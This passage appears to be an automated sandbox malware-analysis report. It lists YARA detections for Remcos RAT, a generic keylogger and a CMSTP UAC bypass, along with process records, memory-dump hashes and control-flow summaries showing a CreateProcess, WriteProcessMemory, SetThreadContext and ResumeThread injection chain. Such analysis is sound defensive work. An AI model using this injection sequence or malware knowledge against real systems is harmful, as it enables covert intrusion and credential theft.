                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                Has exited:true

                                                                                                Target ID:41
                                                                                                Start time:00:17:49
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

Target ID: 42
Start time: 00:17:51
Start date: 22/10/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase: 0x5c0000
File size: 43'008 bytes
MD5 hash: 9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 49df87bc3b065fbfd376a073106870dd6ff6137fa384a0f8b08eadd448919729
                                                                                                  • Instruction ID: c7aaaa50dcea48592e66fef290492383df11e42f049cc0b5483d973b4fdde5a7
                                                                                                  • Opcode Fuzzy Hash: 49df87bc3b065fbfd376a073106870dd6ff6137fa384a0f8b08eadd448919729
                                                                                                  • Instruction Fuzzy Hash: 2BF06220B2DB894FE39AA768482123537A2DB4A700F1000FED41DC73E7CC259C818352
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 30fe7f129da0942f1c5c17de3a33d7f32f211f163c438e28e562b4a9d1475494
                                                                                                  • Instruction ID: b2a7c2b0ded068c9182556a2e095a57e2b5f8753488fb6fca57973198e819c70
                                                                                                  • Opcode Fuzzy Hash: 30fe7f129da0942f1c5c17de3a33d7f32f211f163c438e28e562b4a9d1475494
                                                                                                  • Instruction Fuzzy Hash: 93F0302071DA890FE399A76848647393BA2EB8A704F1141BED56EC72E7DD649C454312
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7b6b721c4a1909b831cb36bee65ce65b147151efdfc28235894dbfb2c5f9d298
                                                                                                  • Instruction ID: 346da973404aec857743ec4ed2165011a234f2470b2ceea34d16384cfbf8f684
                                                                                                  • Opcode Fuzzy Hash: 7b6b721c4a1909b831cb36bee65ce65b147151efdfc28235894dbfb2c5f9d298
                                                                                                  • Instruction Fuzzy Hash: 99F04F20B1DA994FE3AAD77884247782BB2AF4A345F4501FAD05DCB2EBCE285D408351
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3061137897.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b950000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e6bedabed42e8c55157274042c13587d3f524876a464eb874cbbdae8216394d0
                                                                                                  • Instruction ID: 1d9bf36b5ecab952c05470e31a0e8d784234522ca4107ead587ed2d14625fa79
                                                                                                  • Opcode Fuzzy Hash: e6bedabed42e8c55157274042c13587d3f524876a464eb874cbbdae8216394d0
                                                                                                  • Instruction Fuzzy Hash: 49E09B12F5F92D0EE7B5E1DC342A6F853C1DF9861178501B7DC1EC32A6ED04DD110281
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a82c798a63f3bf0dd877ca552c13f84d098c441334fafc9a1e4bdc3aecd6cf6
                                                                                                  • Instruction ID: 3b0a63f7fef9855e9f36d32345d9adfe85992d5f9e5345cbaf2db51520ff849f
                                                                                                  • Opcode Fuzzy Hash: 5a82c798a63f3bf0dd877ca552c13f84d098c441334fafc9a1e4bdc3aecd6cf6
                                                                                                  • Instruction Fuzzy Hash: DAF0F834A1DA894FE39AD76884616653BA2EB8A300F6540FAD05DCB2E7CD3898818351
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dfd3e17cf7ca21a7feaad2832ee11075258f41eb8209692d75833de2aa40ad88
                                                                                                  • Instruction ID: 113f51b970a867fd3e9c4416c7137e7e1cac1524973213c2aa113e0b5362486a
                                                                                                  • Opcode Fuzzy Hash: dfd3e17cf7ca21a7feaad2832ee11075258f41eb8209692d75833de2aa40ad88
                                                                                                  • Instruction Fuzzy Hash: 32E08031B1D9098FD729DB5CD4502BD7352E789311F118279D01DC72D7DE3999428784
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: de5b0d826e0a533eef99329b053df7aaf1a91fa0527d5ec5bf81ed4a0ca49ede
                                                                                                  • Instruction ID: f9355430255a6896b835de1e3ce26c0749b1b75c655e934e3d16110c3243bec1
                                                                                                  • Opcode Fuzzy Hash: de5b0d826e0a533eef99329b053df7aaf1a91fa0527d5ec5bf81ed4a0ca49ede
                                                                                                  • Instruction Fuzzy Hash: E8D05B15F1D9C95BE359D774442033537A79B8A311F1541B9D07EC72D2CD240D418212
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 781ada4a0848b7275b8608ce5aed192727783e19fa73094fdc62f03d6d0e08f3
                                                                                                  • Instruction ID: 86789feb71bb5086222d09250dcfb0a0645474014afb99075cb53bf86a81e77c
                                                                                                  • Opcode Fuzzy Hash: 781ada4a0848b7275b8608ce5aed192727783e19fa73094fdc62f03d6d0e08f3
                                                                                                  • Instruction Fuzzy Hash: 69C04C10F1C91A4BE3197658BD2667C7191AB58305F20407AF62DC72DBED286C52464B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2732974153.00007FFD9B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b79d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: *V]
                                                                                                  • API String ID: 0-1765410883
                                                                                                  • Opcode ID: 4d44ead174f3743ef80400ca25ba98739f6aae077673cc86e2a24785515c362d
                                                                                                  • Instruction ID: 6292b7e9a3590a546edbd0a01f77368dc5b03e29420475b7ac6286fd79827fe4
                                                                                                  • Opcode Fuzzy Hash: 4d44ead174f3743ef80400ca25ba98739f6aae077673cc86e2a24785515c362d
                                                                                                  • Instruction Fuzzy Hash: C041193140EBC44FE7569B2898519523FF0EF57220B1A06DFD088CB1B3D629A84AC792
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2757163747.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 48733a1530a038240021cf28d020a253789a1a60953e8435daf1efc9ddde02f9
                                                                                                  • Instruction ID: b451fbab755a76c095f19dc21500bd263c58cb10dd7c19b5e95fbd73eefa1317
                                                                                                  • Opcode Fuzzy Hash: 48733a1530a038240021cf28d020a253789a1a60953e8435daf1efc9ddde02f9
                                                                                                  • Instruction Fuzzy Hash: 90D17732B1EE8D1FEBA59BA858659B57BE1EF56310B0900FED45CCB0E3D928AD01C341
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 928371046e5c5e0887cf86a99e6c6a7c6db0a412f6ec096b460e70ecfb5782a3
                                                                                                  • Instruction ID: 46518c63b4f6befc7408d644176bef88ab96addec333b7fcf75fdec7a7e9cfba
                                                                                                  • Opcode Fuzzy Hash: 928371046e5c5e0887cf86a99e6c6a7c6db0a412f6ec096b460e70ecfb5782a3
                                                                                                  • Instruction Fuzzy Hash: 1B411B7191DA884FDB599B6C9C1A6B87BE0FB59310F04417FE459C3297DA30A905CBC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80253d4f41245a86c04434fbd5c593ba65c7f249b244014ce12ccaf4ac4ab82f
                                                                                                  • Instruction ID: bd446e600eb4f1ae09f0a6e056040d094a9bb4aae158b9af2aaa1b567b474083
                                                                                                  • Opcode Fuzzy Hash: 80253d4f41245a86c04434fbd5c593ba65c7f249b244014ce12ccaf4ac4ab82f
                                                                                                  • Instruction Fuzzy Hash: 9431F63190D78C4FCB59DF5888496E93FF0EF66321F0441AFC048C7162D634980ACB51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4b1457db804ee2d49e49c858d969c6c8efde2bb07d4f57b8d2a7a60a7c0786fd
                                                                                                  • Instruction ID: f4812e08113affe7637248cf53e4a041996e622f03108f5bf119d62371c3c73b
                                                                                                  • Opcode Fuzzy Hash: 4b1457db804ee2d49e49c858d969c6c8efde2bb07d4f57b8d2a7a60a7c0786fd
                                                                                                  • Instruction Fuzzy Hash: 7C21FCB690E9DD5FE7A2DB68487A0D07FB0EF2520470A01E7D4D98B0B3FD2116058BD2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                  • Instruction ID: 9bdfda7ff094c016ee29611a0f36b44afefaafe4c9d5040173e090ca4ad0f1af
                                                                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                  • Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E882CB41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2757163747.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e46850aaa48fa154aef65c03c46679ea6cef6ebcb7f57dd517233b3b6b11b00
                                                                                                  • Instruction ID: 33db15b90b40db0e45143d90ffee0a8f84974b6438128fee394d780f2c28e1c3
                                                                                                  • Opcode Fuzzy Hash: 9e46850aaa48fa154aef65c03c46679ea6cef6ebcb7f57dd517233b3b6b11b00
                                                                                                  • Instruction Fuzzy Hash: 7DF0BE32B0E9098FD769EA5CE4519A873E0EF6532071640BAE06DC72B3CA35EC40C741
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2757163747.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • Instruction Fuzzy Hash: A431B293E0FAE75BEA230779887D4D93F90EF2679470A06F6C4EA4B093BD0475074241
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: M_^$M_^$M_^$M_^
                                                                                                  • API String ID: 0-1397233021
                                                                                                  • Opcode ID: 289114810f1e4022ea41dc9e80480b98549edb5f8318ebe741bbc76379e7e413
                                                                                                  • Instruction ID: f833a8acfd968a998f02fcfb689f569617c34a722b9730c3ed00ef44eb3a80e0
                                                                                                  • Opcode Fuzzy Hash: 289114810f1e4022ea41dc9e80480b98549edb5f8318ebe741bbc76379e7e413
                                                                                                  • Instruction Fuzzy Hash: 5841A553A0F7CA6FEB6747795C790943FE0EF16A9470A02F7C4E48B0A3ED0469478242
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: M_^$M_^$M_^$M_^
                                                                                                  • API String ID: 0-1397233021
                                                                                                  • Opcode ID: 5ef065a1410b0c19444c7b3abac5a3ebc159563e754cb02864a02f0759cecc2f
                                                                                                  • Instruction ID: e4fe3e553c880f9ad68dba647073d26f357e15c67a89e1edf001fa47e5098f62
                                                                                                  • Opcode Fuzzy Hash: 5ef065a1410b0c19444c7b3abac5a3ebc159563e754cb02864a02f0759cecc2f
                                                                                                  • Instruction Fuzzy Hash: 7711C693F0F9D75BEA6307AE48790993F90FF5679471B02F2C0E9860B3BD15A9074211
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2038351727.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                  • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                  • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2154634408.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                                                                                  • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                  • Opcode Fuzzy Hash: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                                                                                  • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

                                                                                                  Execution Graph

                                                                                                  Execution Coverage: 4.9%
                                                                                                  Dynamic/Decrypted Code Coverage: 0%
                                                                                                  Signature Coverage: 0%
                                                                                                  Total number of Nodes: 12
                                                                                                  Total number of Limit Nodes: 0

                                                                                                  Control-flow Graph

                                                                                                  [Control-flow graph rendering omitted; legend: Executed / Not Executed. Basic blocks span 7ffd9b970e8d-7ffd9b971789; no API calls are annotated in this graph.]
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2633720709.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b970000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: K_H
                                                                                                  • API String ID: 0-3938840025
                                                                                                  • Opcode ID: fd79d0cd2aa3597b3eef1854d6afbd5d6be39aa27bbc329916bbe026b11a4f2c
                                                                                                  • Instruction ID: aa47d502348c7c8d803023cde55dd325caac6ffb31b71e9179de0b723f3f458f
                                                                                                  • Opcode Fuzzy Hash: fd79d0cd2aa3597b3eef1854d6afbd5d6be39aa27bbc329916bbe026b11a4f2c
                                                                                                  • Instruction Fuzzy Hash: DF625A31B1EB8D1FE7AA876858A55B47BD1EF56324B0A01FFD04DC71A3DE18AD068381

                                                                                                  Control-flow Graph

                                                                                                  [Control-flow graph rendering omitted; legend: Executed / Not Executed. Basic blocks span 7ffd9b8aa084-7ffd9b8aa4e1; the graph annotates a call to CreateProcessA and a call to the subroutine at 7ffd9b8aa4e2.]
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2622859939.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b8a0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: d1a41e9516184ab5f8dd7de960e7a22beed805ff51fb3586db27a113d823bb61
                                                                                                  • Instruction ID: 3870a167e2829ab0307fc41ffe04e0939f008618613dc3c83c6696b4a622782e
                                                                                                  • Opcode Fuzzy Hash: d1a41e9516184ab5f8dd7de960e7a22beed805ff51fb3586db27a113d823bb61
                                                                                                  • Instruction Fuzzy Hash: 03D1A530A18E8D8FDB78DF18DC567E977D1FB59310F10422AE84EC7291DE74AA418B92

                                                                                                  Control-flow Graph

                                                                                                  [Control-flow graph rendering omitted; legend: Executed / Not Executed. Basic blocks span 7ffd9b8a9d24-7ffd9b8a9e5d; the graph annotates a call to WriteProcessMemory.]
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2622859939.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b8a0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: cd4184bca02da2cea938e4f8afb91cebc65e4ba7d6cfe9fc54b9fa1a6e509e7f
                                                                                                  • Instruction ID: 6bc68ca129e703301648b4b5c9c34d882029d5118b00636bdddc434f5d8a1661
                                                                                                  • Opcode Fuzzy Hash: cd4184bca02da2cea938e4f8afb91cebc65e4ba7d6cfe9fc54b9fa1a6e509e7f
                                                                                                  • Instruction Fuzzy Hash: F541E631D0CB5C4FDB289F98A8466F97BE0EB99320F00426FE449D3292DE74A846C7D1

                                                                                                  Control-flow Graph

                                                                                                  [Control-flow graph rendering omitted; legend: Executed / Not Executed. Basic blocks span 7ffd9b8a9b18-7ffd9b8a9c19; the graph annotates a call to Wow64SetThreadContext.]
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2622859939.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b8a0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: 30671b5d8d174b7ce5a2b9abf73caf659ac80bbef1e42b3dc128c680dc140d36
                                                                                                  • Instruction ID: b037e46e09a113cb3a831d859854a1e91a4f61dcdf065f92c0fcfad9ac4f3479
                                                                                                  • Opcode Fuzzy Hash: 30671b5d8d174b7ce5a2b9abf73caf659ac80bbef1e42b3dc128c680dc140d36
                                                                                                  • Instruction Fuzzy Hash: 6E312631D0CB184FDB289BA8A84A6FA7BE1EF55321F04427FD04AD32D2DF74A4068791

                                                                                                  Control-flow Graph

                                                                                                  [Control-flow graph rendering omitted; legend: Executed / Not Executed. Basic blocks span 7ffd9b8a9a1d-7ffd9b8a9b11; the graph annotates a call to ResumeThread.]
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2622859939.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b8a0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 5242a813844bb258d9ea1c2a2b18b881023dd5d3655788f5594d57470218251d
                                                                                                  • Instruction ID: aedc4f21b4d5ad4652b33605eb9e4b741c98dc356b1ddf00d17fc9e5d2c5f772
                                                                                                  • Opcode Fuzzy Hash: 5242a813844bb258d9ea1c2a2b18b881023dd5d3655788f5594d57470218251d
                                                                                                  • Instruction Fuzzy Hash: 23312830A0D7884FDB5ADBA898567E97FF0EF56320F0442AFD049C71A3DA786406C751

                                                                                                  Control-flow Graph

                                                                                                  [Control-flow graph rendering omitted; legend: Executed / Not Executed. Basic blocks span 7ffd9b970ade-7ffd9b970c06; no API calls are annotated in this graph.]
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2633720709.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b970000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f81f372545c912f078134429faf148d89630ca263cbf1ff620986638b13e2424
                                                                                                  • Instruction ID: 45675db68a4fd751af9bff478f68282a0d82fe529e07d1348b8999acadf31b84
                                                                                                  • Opcode Fuzzy Hash: f81f372545c912f078134429faf148d89630ca263cbf1ff620986638b13e2424
                                                                                                  • Instruction Fuzzy Hash: 7E411B22B2EE1E5FEFB897B814B16B573C2DF54B15B4500BAD44DC31D6DE08AE014381

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2633720709.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b970000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a11bf6bd374bbfe61dfeeb8996e6b8b1821321ecd5bfb44d7c9444efbea4bd96
                                                                                                  • Instruction ID: c20cdf93c76e911d3cc66dd63cf3c8fe169a1a743fef2c08664840aca2a10e4d
                                                                                                  • Opcode Fuzzy Hash: a11bf6bd374bbfe61dfeeb8996e6b8b1821321ecd5bfb44d7c9444efbea4bd96
                                                                                                  • Instruction Fuzzy Hash: 4701A512F2EE5E1AF7B9E7AC287917466C2DFD4E20F4602B7D81CC3296ED04AD124285

                                                                                                  Execution Graph

                                                                                                  Execution Coverage: 4.4%
                                                                                                  Dynamic/Decrypted Code Coverage: 0%
                                                                                                  Signature Coverage: 0%
                                                                                                  Total number of Nodes: 12
                                                                                                  Total number of Limit Nodes: 0

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2746792345.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: J_H
                                                                                                  • API String ID: 0-3943139310
                                                                                                  • Opcode ID: fa1dada4720692a55a0b2d870a90282b76e19fe0750d823e7bdcfb05be6f3edd
                                                                                                  • Instruction ID: 80003f927aebc6aa75ad1fa5fc9241841ae0c7822bd13f907b2b4b055674c9f8
                                                                                                  • Opcode Fuzzy Hash: fa1dada4720692a55a0b2d870a90282b76e19fe0750d823e7bdcfb05be6f3edd
                                                                                                  • Instruction Fuzzy Hash: B6826A22B1EFD91FE766876858655B43FE1EF5A224B0A01FFD08DC71E3D928AD068341

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
